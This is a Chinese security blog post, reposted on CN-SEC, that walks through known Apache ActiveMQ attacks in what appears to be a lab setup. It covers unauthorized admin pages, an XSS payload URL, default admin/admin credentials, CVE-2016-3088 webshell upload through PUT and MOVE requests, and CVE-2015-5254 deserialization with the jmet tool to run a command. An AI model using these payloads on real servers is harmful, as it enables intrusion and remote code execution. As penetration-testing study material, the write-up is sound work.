ActiveMQ

admin 2022年12月28日19:06:28安全文章评论5 views1083字阅读3分36秒阅读模式

简介

Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。

61616是工作端口,8161是默认web管理页面端口。

ActiveMQ

未授权

/admin/connections.jsp

XSS

/admin/queueBrowse/example.A?view=rss&feedType=<script>alert("ACTIVEMQ")</script>

源码泄露

/admin/index.jsp/admin/queues.jsp/admin/topics.jsp

物理路径泄露

PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1Host: IP地址:8161Authorization: Basic YWRtaW46YWRtaW4=Content-Length: 4test

弱口令

弱口令:admin/admin

ActiveMQ

CVE-2016-3088

影响版本

Apache ActiveMQ 5.x ~ 5.14.

1.登录后访问/admin/test/systemProperties.jsp获得绝对路径。

ActiveMQ

2.获得路径后,使用PUT上传webshell。

ActiveMQ

3.上传后是无法解析的,ActiveMQ的解析目录是/api/。使用MOVE方法移动上传后的木马使其可解析。

ActiveMQ

4.访问api目录,看到上传后的木马文件

ActiveMQ

5./api/5.jsp?cmd=ls(需要登录)

ActiveMQ

CVE-2015-5254

影响版本

Apache ActiveMQ 5.13.0之前5.x版本

登录后查看版本

ActiveMQ

1.下载jmet

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

2.给目标ActiveMQ添加一个名为event的队列,此时就成功给服务器添加了一个“事件”

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/hacker_test" -Yp ROME IP 61616

3.添加后,打开/admin/browse.jsp?JMSDestination=event查看事件。

ActiveMQ

4.出现了如下界面,这下咱们的payload就执行了而且向服务器的/tmp下面写入一个文件hacker_test

ActiveMQ

5.进入容器查看。

docker-compose exec activemq bash

ActiveMQ

原文始发于微信公众号(破晓信安):ActiveMQ

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月28日19:06:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  ActiveMQ http://cn-sec.com/archives/1484677.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: